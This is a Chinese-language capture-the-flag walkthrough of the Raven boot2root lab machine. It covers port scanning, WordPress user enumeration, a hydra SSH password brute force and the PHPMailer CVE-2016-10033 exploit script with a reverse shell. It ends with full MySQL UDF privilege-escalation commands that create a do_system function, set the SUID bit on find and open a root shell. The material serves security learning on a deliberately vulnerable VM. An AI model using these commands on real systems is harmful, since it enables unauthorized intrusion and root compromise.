渗透测试-靶机Raven

攻击机 ip:192.168.195.133
靶机 ip:192.168.195.139

  1. 探测存活主机

root@kali:~# arp-scan -l

1.png
  1. 端口探测(nmap为例)

root@kali:~# nmap -sV -p- 192.168.195.139

2.png
  1. 使用 Dirbuster 工具进行敏感目录扫描
  • 方法一
    3.png

    其中通过访问vendor目录发现PHPMailerAutoload.php文件,查询后发现CVE-2016-10033PHPMailer中存在的高危安全漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。(见方法二)

4.png

通过访问service.html查看源代码发现flag

5.png
  1. 由于发现wordpress目录,所以使用Wpscan扫描
    Wpscan是一个扫描WordPress漏洞的黑盒子扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等

root@kali:~# wpscan --url "http://192.168.195.139/wordpress" -e u vp
-e 枚举方式
u id 为1-10的用户名
vp 扫描脆弱插件

探测到两个用户名,如图


6.png
  1. 使用hydra对其进行SSH爆破

root@kali:~# hydra -l michael -P '/root/Desktop/常用密码.dict' -V -o ssh.log 192.168.195.139 ssh

破解出密码:“michael”(em...我其实没破解出来)

  1. 成功登录ssh

root@kali:~#ssh michael@192.168.195.139

7.png

查询到 /var/www目录下存放flag2.txt

michael@Raven:/var/www$ cat flag2.txt

8.png

wordpresswp_config.php里找到mysql的账户密码

michael@Raven:/var/www/html/wordpress$ vi wp-config.php

9.png
  1. 上传一个大马并访问
    通过连接mysql查询到flag3 flag4
    10.png
11.png
  1. 提权
    stevenhash值进行md5解密得到pink84
    12.png

    13.png

    python -c ’import pty; pty.spawn("/bin/sh")’得到一个可以交互的shell,在有root密码的前提下可以su,stevenroot账户
    14.png

    成功提权至root账户
  • 方法二
利用PHPMailer命令执行以及mysql udf提权

使用kali搜索漏洞有关的代码库

searchspolit phpmailer

15.png

探测到PHPMailer版本为5.2.16,这里使用pythohn远程代码执行脚本
16.png

拷贝脚本到本地

cp /usr/share/exploitdb/platforms/php/webapps/40974.py /

17.png

查看并修改相关参数


18.png

编译运行代码,成功运行后将在文件根目录下生成 wcute.php文件

19.png

本地开启监听,wcute.php 文件运行后shell成功反弹

20.png

使用python -c ’import pty; pty.spawn("/bin/bash")’得到一个可以交互的shell

21.png

wordpresswp_config.php里找到mysql的账户密码

michael@Raven:/var/www/html/wordpress$ vi wp-config.php

22.png

使用netstat -a发现mysql服务启动
23.png

查看进程发现mysql是以root权限运行的,此时想到了mysql提权,这里以udf提权为例
24.png

查询到mysql udf提权exp编号为1518,拷贝exp到本地/var/www/html

cp /usr...... /var/www/html

25.png

编译生成动态链接库文件,方便上传至靶机


26.png

使用wget上传至靶机(主机开启Apache服务)

27.png

靶机连接mysql开始进行提权操作

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.22 sec)

mysql> use wordpress
use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.43 sec)

mysql> insert into foo values(load_file('/var/www/html/1518.so'));
insert into foo values(load_file('/var/www/html/1518.so'));
Query OK, 1 row affected (0.10 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
Query OK, 1 row affected (0.06 sec)

mysql> create function do_system returns integer soname '1518.so';
create function do_system returns integer soname '1518.so';
Query OK, 0 rows affected (0.10 sec)

mysql> select * from mysql.func;
select * from mysql.func;
+-----------+-----+---------+----------+
| name      | ret | dl      | type     |
+-----------+-----+---------+----------+
| do_system |   2 | 1518.so | function |
+-----------+-----+---------+----------+
1 row in set (0.00 sec)

mysql> select do_system('chmod u+s /usr/bin/find');
select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.02 sec)
mysql> quit
quit
Bye
www-data@Raven:/var/www/html$ touch foo
touch foo
www-data@Raven:/var/www/html$ find foo -exec 'whoami' \;
find foo -exec 'whoami' \;
root
www-data@Raven:/var/www/html$ find foo -exec '/bin/sh' \;
find foo -exec '/bin/sh' \;
# whoami
whoami
root
# pwd
pwd
/var/www/html
# cd /root
cd /root
# ls
ls
flag4.txt
# cat flag4.txt
cat flag4.txt
______

| ___ \

| |_/ /__ ___   _____ _ __

|    // _` \ \ / / _ \ '_ \

| |\ \ (_| |\ V /  __/ | | |

\_| \_\__,_| \_/ \___|_| |_|


flag4{715dea6c055b9fe3337544932f2941ce}

CONGRATULATIONS on successfully rooting Raven!

This is my first Boot2Root VM - I hope you enjoyed it.

Hit me up on Twitter and let me know what you thought:

@mccannwj / wjmccann.github.io

成功提权

参考链接:
https://www.anquanke.com/post/id/163996
https://www.cnblogs.com/bmjoker/p/10034001.html